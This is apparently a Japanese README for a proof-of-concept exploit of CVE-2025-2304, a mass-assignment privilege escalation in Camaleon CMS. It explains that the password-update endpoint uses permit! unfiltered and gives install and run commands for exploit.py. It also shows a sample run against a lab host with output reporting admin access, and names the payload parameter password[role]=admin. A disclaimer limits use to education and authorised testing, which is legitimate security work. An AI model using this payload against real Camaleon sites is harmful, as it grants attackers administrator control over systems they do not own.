
Camaleon CMS における CVE-2025-2304 権限昇格の PoC
Camaleon CMS は Mass Assignment による権限昇格に対して脆弱です
Camaleon CMS には、Mass Assignment による権限昇格の脆弱性が存在します。
ユーザーがパスワードを変更したい場合、UsersController の 'updated_ajax' メソッドが呼び出されます。この脆弱性は、すべてのパラメータをフィルタリングなしで通過させる危険な permit! メソッドの使用に起因します。
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - 脆弱なアプリケーションのベース URL-u - 認証用のユーザー名-p - 認証用のパスワードpython exploit.py --url http://facts.htb -u krrish -p krrish
出力:
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=admin パラメータを含むパスワード更新リクエストを送信しますこのツールは、教育および許可されたセキュリティテストの目的のみで使用されます。コンピュータシステムへの不正アクセスは違法です。